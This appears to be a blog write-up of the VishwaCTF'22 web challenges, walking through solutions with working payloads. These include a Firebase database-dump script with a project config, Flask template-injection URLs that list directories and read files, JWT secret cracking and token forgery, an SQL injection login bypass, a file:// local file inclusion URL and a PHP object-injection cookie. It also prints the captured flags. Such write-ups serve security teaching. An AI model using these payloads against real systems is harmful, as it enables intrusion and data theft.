Categories
Capture The Flag

VishwaCTF’22 writeups: Web

Below are the Web-writeups of all the challenges that were being asked in the VishwaCTF'22, organised by Cyber cell VIIT, Pune.

Flag.Collection

img

Solution

The challenge was about a common Firebase Vuln wherein people forget to setup proper firebase rules and ends up giving their db access to anyone

Step 1:

If you inspect the web page you may find a lot of obfuscated JS. If you closely look at the end, you may find some firebase configs. Using this we can design our own frontend/cli app to get access to the database and view all the entries in hope of finding the real flag.

img

Step 2;

I made a simple JS script to query everything that was present in the database.

firebase.initializeApp({
  apiKey: "AIzaSyCOrohCmYL_hq5DaqFbQM3rxHXT0pNE6SA",
  authDomain: "vishwa-ctf-challenge-12.firebaseapp.com",
  projectId: "vishwa-ctf-challenge-12",
  storageBucket: "vishwa-ctf-challenge-12.appspot.com",
  messagingSenderId: "125452069157",
  appId: "1:125452069157:web:2d20b318f3e448ebfa52cc",
});

var db = firebase.firestore();
const getd = async function () {
  await db
    .collection("flag")
    .get()
    .then((res) => {
      res.forEach((doc) => {
        // console.log(doc._delegate._document.data.value.mapValue.fields);
        console.log(doc);
      });
    });
};

getd();

After running this lil' script, I got a bunch of entries and the top most contained the main flag.

.

vishwaCTF{c0nfigur3_y0ur_fir3b@s3_rule$}

Hey Buddy

img

Solution:

This challenge is developed using a flask and it contains the SSTI (Server Side Template Injection) vulnerability. It has two steps to exploit.

Step 1: Checking where is the flag file location

https://h3y-buddy.vishwactf.com/submit?name={{request.application.__globals__.__builtins__.__import__(%27os%27).listdir()}}
img

Step 2: Reading flag file using the vulnerability

https://h3y-buddy.vishwactf.com/submit?name={{%27abc%27.__class__.__base__.__subclasses__()[92].__subclasses__()[0].__subclasses__()[0](%27flag.txt%27).read()}}
img

Keep Your Secrets

img

Solution:

This is a simple JWT hacking challenge. We need to generate a JWT token having an admin role instead of having a user.

Step 1:

Get the JWT token by making a GET request

img

Step 2:

Using tools like jwt-cracker, you can easily find out the secret by brute-forcing it. After bruteforcing it you will get the secret(owasp).

Step 3:

Go to JWT.io, change role from 'user' to 'admin' and enter your secret. After doing this make sure you copy your newly forged token.

Step 4:

Using Postman(or any other tool for that matter) make a post request on /api/login/user and put your token in header as 'token'.

img

and from here you get the Flag.

vishwactf{w3@k_$ecr3t$}

My useless website

img

Solution:

This is the simple example of SQL injection which you might know about already. By entering 'OR'1'='1 in both of the inputs (username and password) will return the flag as a sweetalert.

img
img

Request me FLAG

img

Solution:

The challenge name itself contains the hint. Request Me FLAG means just change the Request method GET to FLAG using burp suite or curl.

$ curl -I https://r3qu35t-m3-fl4g.vishwactf.com -X FLAG
HTTP/1.1 200 OK
date: Mon, 21 Mar 2022 09:55:32 GMT
server: Apache/2.4.37 (Red Hat Enterprise Linux) OpenSSL/1.1.1k
flag: VishwaCTF{404_1s_ju57_4n_i11u5ion}
content-length: 0
content-type: text/html; charset=UTF-8

Stock bot

img

Solution:

This challenge includes LFI (Local File Inclusion) vulnerability. It fetch the data related to stock available of particular product. Also the location where the flag is present is given in the script as comment. There might be other ways to get the flag but I am injecting payload in the URL which looks like URL given below.

https://st0ck-b0t.vishwactf.com/Products/check.php?product=file:///opt/app-root/src/Products/Flag
img

Strong Encryption

img

Solution:

In this challenge you have given a Flag which is encrypted by the encrypt function as you can see in the given PHP code. You have two ways to solve this challenge. Either you can manually reverse the encryption logic or you can write a code to do that.

Decrypt.php

function decrypt($str,$uenKey){

    $enKeyHash='';
    $strHex='';
    $Key='';
    $tmpKey='';
    $decTxt='';

    for($i=strlen($str)-64;$i<strlen($str);$i++){
        $enKeyHash.=$str[$i];
    }    

    $rKeyHex=$str[-66].$str[-65];
    $rKey=hexdec($rKeyHex);

    for($i=0;$i<strlen($str)-66;$i++){
        $strHex.=$str[$i];
    }  

    for($i=0;$i<strlen($uenKey);$i++){
        $Key.=ord($uenKey[$i])+$rKey;
        $tmpKey.=chr(ord($uenKey[$i])+$rKey);
    } 
    
    for ($i=0, $j=0; $i < strlen($str)-66; $i+=2, $j++){
        if($j==strlen($Key)){
                $j=0;
        }    
          $decTxt.=chr(hexdec($str[$i].$str[$i+1])-$Key[$j]);
    }
    return $decTxt;
  
}

$encTxt="576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7";
$decTxt = decrypt($encTxt, "VishwaCTF");
echo $decTxt;

Output:

VishwaCTF{y0u_h4v3_4n_0p_m1nd}

Todo List

img

Solution:

This challenge contains the PHP Object Injection vulnerability which allows attacker to modify the object. Your task is to modify the object which will be stored as a cookie when you add any task in the list. You will get basic payload creation idea if you see the provided PHP code carefully.

Payload Creation

Step 1 - Basic payload to read flag.php

a:1:{i:1;O:10:"ShowSource":1:{s:6:"source";s:8:"flag.php";}}

Step 2 - Getting SHA1 hash of above payload

img

Step 3 - Encoding the basic payload

img

Step 4 - Concatenating generated Hash and Encoded Basic Payload together.

168ebef72875ddf6d6e4ac71f87a4bb2be6b5373a%3A1%3A%7Bi%3A1%3BO%3A10%3A%22ShowSource%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

Payload Injection

Step 1 - Just add any random task in todo list

Step 2 - Go to cookies section by inspecting the page

img

Step 3 - Edit todos cookie value and paste our payload and refresh the page.

img

Get the latest tech news and updatesethical hacking tutorials and cybersecurity tips and tricks. Check out MeuSec for more.

Sometimes we include links to online retail stores and/or online campaigns. If you click on one and make a purchase we may receive a small commission.

Comments:

Leave a Reply

Your email address will not be published. Required fields are marked *